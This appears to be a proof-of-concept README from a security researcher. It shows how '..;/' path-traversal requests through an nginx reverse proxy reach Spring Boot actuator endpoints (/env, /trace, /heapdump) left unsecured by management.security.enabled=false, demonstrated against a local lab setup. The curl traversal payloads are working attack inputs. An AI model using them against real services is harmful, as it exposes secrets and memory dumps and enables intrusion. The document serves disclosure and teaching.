This is a PoC that combines Orange Tsais research about "Breaking parser logic" and an unsecure configuration of spring-boot-starter-actuator as documented in Baeldungs Docs 3.7 Further Customization
I do not want to blame Baeldung. His documentations are incredibly helpful. He also explains what management.security.enabled=false means. The thing is, that we people will copy and paste this examples without reading the explanations.
Here is another example of this setting: Learn SpringBoot absolute beginners
If you have a java spring-boot service behind a reverse proxy that only exposes a sub path to the internet people may be able to access all paths on the spring-boot service. Actuator endpoints are just an example.
- cd spring; mvn clean install
- cd target; java -jar orange-actuator-poc-0.0.1-SNAPSHOT.jar
- test java service:
curl http://localhost:8080/api/hello - install nginx and change nginx server listen port to 8081
- add this to your nginx configuration to add a proxy rule:
location /orange {
proxy_pass http://localhost:8080/api;
proxy_redirect off;
proxy_set_header Host $host;
}
- start nginx
curl localhost:8081/orange/..;/envcurl localhost:8081/orange/directory/..;/..;/env
Nginx will send the request to the spring boot application at http://localhost:8080/api/directory/..;/..;/env
The path traversal makes that a request to http://localhost:8080/env
/env can be substituted by any default actuator endpoint, e.g. /trace or /heapdump